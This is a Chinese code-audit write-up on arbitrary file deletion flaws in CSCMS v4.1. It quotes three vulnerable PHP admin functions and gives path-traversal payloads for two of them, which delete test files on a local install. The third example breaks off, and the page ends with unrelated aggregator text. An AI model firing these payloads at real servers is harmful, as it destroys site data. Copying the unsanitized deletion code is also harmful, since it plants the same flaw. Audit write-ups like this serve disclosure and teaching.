【代码审计】任意文件删除漏洞实例
任意文件删除漏洞,该漏洞可让攻击者随意删除服务器上的任意文件。
环境搭建:
CSCMS :http://www.chshcms.com/
网站源码版本:Cscms_v4.1正式版(发布日期:2017-06-05)
程序源码下载:https://github.com/chshcms/cscms
漏洞实例一:
漏洞文件位置:\cscms\plugins\sys\admin\Basedb.php 第160-177行:
public function del(){ $dir = $this->input->get_post('id',true); if(empty($dir)){ getjson(L('plub_11')); } $dirs = array(); if(!is_array($dir)){ $dirs[] = $dir; }else{ $dirs = $dir; } foreach($dirs as $dir) { deldir(FCPATH.'attachment/backup/'.$dir); } $info['msg'] = L('plub_12'); $info['url'] = site_url('basedb/restore').'?v='.rand(1000,9999); getjson($info,0); }
漏洞利用:
1、 根目录下新建test目录作为测试:
2、 构造参数成功删除test目录
http://127.0.0.1/admin.php/basedb/del
POST:id=..\\..\\test
漏洞实例二:
漏洞文件位置:/plugins/sys/admin/Skin.php 第418--440行:
public function del(){ $ac = $this->input->get('ac',true); $op = $this->input->get('op',true); $dir = $this->input->get('dirs',true); $file = $this->input->get('file'); if($ac!='mobile') $ac='pc'; if($op!='home' && $op!='user') $op='skins'; if(empty($dir)) getjson(L('plub_27')); $skin_dir = VIEWPATH.$ac.FGF.$op.FGF.$dir.FGF.$file; if (!is_dir($skin_dir)) { //文件 $res=unlink($skin_dir); }else{ //目录 $res=deldir($skin_dir); } if($res){ $info['url'] = site_url('skin').'?ac='.$ac.'&op='.$op.'&v='.rand(1000,9999); $info['msg'] = L('plub_46'); $info['turn'] = 1; getjson($info,0); }else{ getjson(L('plub_28')); }
漏洞利用:
网站根目录下新建1.txt文件作为测试,构造URL成功删除文件
Payload:http://127.0.0.1/admin.php/skin/del?ac=pc&op=skins&dirs=default&file=..\\..\\..\\..\\1.txt
漏洞实例三:
漏洞文件位置:/plugins/sys/admin/Plugins.php 第285-299行:
public function del(){
$dir = $this->input->get_post('dir',true);
if($dir==''){
getjson(L('plub_del_0'),1);
}
deldir(FCPATH.'plugins'.FGF.$dir.FGF);
//删除配置目录
deldir(CSCMS.$dir.FGF);
//删除模板目录
deldir(FCPATH.'tpl/admin/'.$dir.FGF);
$info['func'] = __FUNCTION__;
$info['msg'] = L('plub_del_1');
getjson($info,0);
}
漏洞利用:
关注公众号
低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。
持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。
-
上一篇
搞 Java 的年薪 40W 是什么水平?
做Java架构师(P7)岗位有一年时间了,期间也从事了很多招聘定级工作,来说说我见解吧。 既然楼主提到年薪40w,那我们看看什么公司,什么级别可以给到,再看看要求。 阿里是Java大厂,所以可以参考阿里的标准,阿里一般是16薪水,所以就是税前2.5w,在阿里应该是P6就可以达到,而对P6的要求是什么呢,我们内部有个简单的概述,那就是可以独立完成部门内部的项目,而面试过程中,也会有相应的考察。 如何定义一个人可否完成部门内部项目 代码能力 代码能力是基本功,Java语言本身,包括语言的各个方面包括对并发的理解,对内存使用对理解,对Java运维的理解等等。语言本身外,社区里常用的框架是否可以十分清晰的了解,包括spring,包括他实现的ioc,aop,orm,web机制是否有清楚的认识,有丰富的经验等等。 对常用中间件的理解 毕竟在一个大系统中,各种中间件是是否常见的,缓存中间件,消息中间件,例如 redis、memcache、rmq这些。要理解常用中间件使用场景,使用姿势(例如redis的常用命令),甚至包括他的一些运维。一旦出了问题,除了专门的运维人员,也需要你参与问题的排查,因为有时...
-
下一篇
laravel日常操作
1、创建user表 php artisan make:migration create_users_table --create=users 2、创建控制器(同时创建model) php artisan make:controller PhotoController --resource --model=Photo 3、创建model php artisan make:model Models/Article 4、数据迁移 php artisan migrate 5、生成普通控制器 php artisan make:controller PostController 6、使用RESTFUL生成控制器(自动生成index、create、store、show、edit、update、destory方法) php artisan make:controller PostController --resource 6、默认时间写法 $table->timestamp('time')->default(\DB::raw('CURRENT_TIMESTAMP')); 7、初始化路径 p...
相关文章
文章评论
共有0条评论来说两句吧...
文章二维码
点击排行
推荐阅读
最新文章
- 设置Eclipse缩进为4个空格,增强代码规范
- SpringBoot2整合Redis,开启缓存,提高访问速度
- Springboot2将连接池hikari替换为druid,体验最强大的数据库连接池
- MySQL8.0.19开启GTID主从同步CentOS8
- Dcoker安装(在线仓库),最新的服务器搭配容器使用
- Hadoop3单机部署,实现最简伪集群
- SpringBoot2初体验,简单认识spring boot2并且搭建基础工程
- Docker使用Oracle官方镜像安装(12C,18C,19C)
- CentOS8编译安装MySQL8.0.19
- CentOS6,CentOS7官方镜像安装Oracle11G
微信收款码
支付宝收款码